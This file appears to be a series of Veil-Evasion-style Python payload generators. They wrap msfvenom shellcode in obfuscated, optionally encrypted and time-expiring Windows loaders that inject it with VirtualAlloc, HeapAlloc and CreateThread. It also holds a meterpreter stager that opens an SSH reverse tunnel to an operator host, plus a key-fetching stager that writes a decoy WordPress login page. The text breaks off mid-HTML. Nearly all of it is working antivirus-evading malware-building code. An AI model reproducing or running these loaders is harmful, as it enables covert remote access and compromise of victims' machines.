def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# build our your payload sourcecode
PayloadCode = "..."
# add in a randomized string
PayloadCode += helpers.randomString()
# example of how to check the internal options
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# build our your payload sourcecode
PayloadCode = "..."
# add in a randomized string
PayloadCode += helpers.randomString()
# example of how to check the internal options
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def generate(self):
self._validateArchitecture()
python_source = self.required_options["python_source"][0]
try:
# read in the python source
f = open(python_source, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def generate(self):
self._validateArchitecture()
PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
try:
# read in the python source
f = open(PYTHON_SOURCE, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = "import ctypes as " + randctypes + "\n"
PayloadCode += "import base64\n"
PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandT
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
RandPtr
+ " = "
+ randctypes
+ ".windll.kernel32.VirtualAlloc("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")),"
+ randctypes
+ ".c_int(0x3000),"
+ randctypes
+ ".c_int(0x40))\n"
)
PayloadCode += (
RandBuf
+ " = ("
+ randctypes
+ ".c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
randctypes
+ ".windll.kernel32.RtlMoveMemory("
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ","
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = "
+ randctypes
+ ".windll.kernel32.CreateThread("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".pointer("
+ randctypes
+ ".c_int(0)))\n"
)
PayloadCode += (
randctypes
+ ".windll.kernel32.WaitForSingleObject("
+ randctypes
+ ".c_int("
+ RandHt
+ "),"
+ randctypes
+ ".c_int(-1))\n"
)
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = "import ctypes as " + randctypes + "\n"
PayloadCode += "import base64\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandT
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = "
+ randctypes
+ ".windll.kernel32.VirtualAlloc("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")),"
+ randctypes
+ ".c_int(0x3000),"
+ randctypes
+ ".c_int(0x40))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = ("
+ randctypes
+ ".c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\t"
+ randctypes
+ ".windll.kernel32.RtlMoveMemory("
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ","
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = "
+ randctypes
+ ".windll.kernel32.CreateThread("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".pointer("
+ randctypes
+ ".c_int(0)))\n"
)
PayloadCode += (
"\t"
+ randctypes
+ ".windll.kernel32.WaitForSingleObject("
+ randctypes
+ ".c_int("
+ RandHt
+ "),"
+ randctypes
+ ".c_int(-1))\n"
)
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = "import ctypes as " + randctypes + "\n"
PayloadCode += "import base64\n"
PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandT
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
HeapVar
+ " = "
+ randctypes
+ ".windll.kernel32.HeapCreate("
+ randctypes
+ ".c_int(0x00040000),"
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ") * 2),"
+ randctypes
+ ".c_int(0))\n"
)
PayloadCode += (
RandPtr
+ " = "
+ randctypes
+ ".windll.kernel32.HeapAlloc("
+ randctypes
+ ".c_int("
+ HeapVar
+ "),"
+ randctypes
+ ".c_int(0x00000008),"
+ randctypes
+ ".c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandBuf
+ " = ("
+ randctypes
+ ".c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
randctypes
+ ".windll.kernel32.RtlMoveMemory("
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ","
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = "
+ randctypes
+ ".windll.kernel32.CreateThread("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".pointer("
+ randctypes
+ ".c_int(0)))\n"
)
PayloadCode += (
randctypes
+ ".windll.kernel32.WaitForSingleObject("
+ randctypes
+ ".c_int("
+ RandHt
+ "),"
+ randctypes
+ ".c_int(-1))\n"
)
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = "import ctypes as " + randctypes + "\n"
PayloadCode += "import base64\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandT
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
"\t"
+ HeapVar
+ " = "
+ randctypes
+ ".windll.kernel32.HeapCreate("
+ randctypes
+ ".c_int(0x00040000),"
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ") * 2),"
+ randctypes
+ ".c_int(0))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = "
+ randctypes
+ ".windll.kernel32.HeapAlloc("
+ randctypes
+ ".c_int("
+ HeapVar
+ "),"
+ randctypes
+ ".c_int(0x00000008),"
+ randctypes
+ ".c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = ("
+ randctypes
+ ".c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\t"
+ randctypes
+ ".windll.kernel32.RtlMoveMemory("
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ","
+ randctypes
+ ".c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = "
+ randctypes
+ ".windll.kernel32.CreateThread("
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int("
+ RandPtr
+ "),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".c_int(0),"
+ randctypes
+ ".pointer("
+ randctypes
+ ".c_int(0)))\n"
)
PayloadCode += (
"\t"
+ randctypes
+ ".windll.kernel32.WaitForSingleObject("
+ randctypes
+ ".c_int("
+ RandHt
+ "),"
+ randctypes
+ ".c_int(-1))\n"
)
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = "from ctypes import *\n"
PayloadCode += "import base64\n"
PayloadCode += ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
DecodedShellcode
+ " = bytearray("
+ ShellcodeVariableName
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
RandMemoryShell
+ " = create_string_buffer(str("
+ DecodedShellcode
+ "), len(str("
+ DecodedShellcode
+ ")))\n"
)
PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += RandShellcode + "()"
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = "from ctypes import *\n"
PayloadCode += "import base64\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n'
PayloadCode += (
"\t"
+ DecodedShellcode
+ " = bytearray("
+ ShellcodeVariableName
+ ".decode('base64','strict').decode(\"string_escape\"))\n"
)
PayloadCode += (
"\t"
+ RandMemoryShell
+ " = create_string_buffer(str("
+ DecodedShellcode
+ "), len(str("
+ DecodedShellcode
+ ")))\n"
)
PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += "\t" + RandShellcode + "()"
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
self.shellcode.SetPayload(["windows/meterpreter/bind_tcp", ["LHOST=127.0.0.1",
"LPORT=" + self.required_options["LPORT"][0]]])
Shellcode = self.shellcode.generate()
PayloadCode = """from socket import *
import paramiko
import multiprocessing
import time
import subprocess
import ctypes
import thread
import threading
import select
def inject(shellcode):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def handler(chan, host, port):
sock = socket()
try:
sock.connect((host, port))
except Exception:
pass
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
thr.setDaemon(True)
thr.start()
def main(user,password, rhost, port, shellport):
server = [rhost, int(port)]
remote = ['127.0.0.1', int(shellport)]
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password)
except Exception:
pass
try:
reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport())
except Exception:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
shellcode = r"%s"
shellcode = shellcode.decode("string_escape")
shellcode = bytearray(shellcode)
shellport = "%s"
time.sleep(2)
p = multiprocessing.Process(target=inject, args=(shellcode,))
jobs = []
jobs.append(p)
p.start()
user = "******"
password = "******"
rhost = "%s"
port = "%s"
time.sleep(3)
thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode,
self.required_options["LPORT"][0],
self.required_options["SSHUSER"][0],
self.required_options["SSHPASS"][0],
self.required_options["SSHOST"][0],
self.required_options["SSHPORT"][0])
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
PayloadCode = 'import ctypes as avlol\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'import ctypes as avlol\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\t' + 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
PayloadCode = 'import ctypes as avlol\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'import ctypes as avlol\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
USER_AGENT = "'User-agent', '" + self.required_options[
'USER_AGENT'][0]
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(
str(self.required_options["HTML_FILE_PATH"][0]) +
target_html_file, 'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
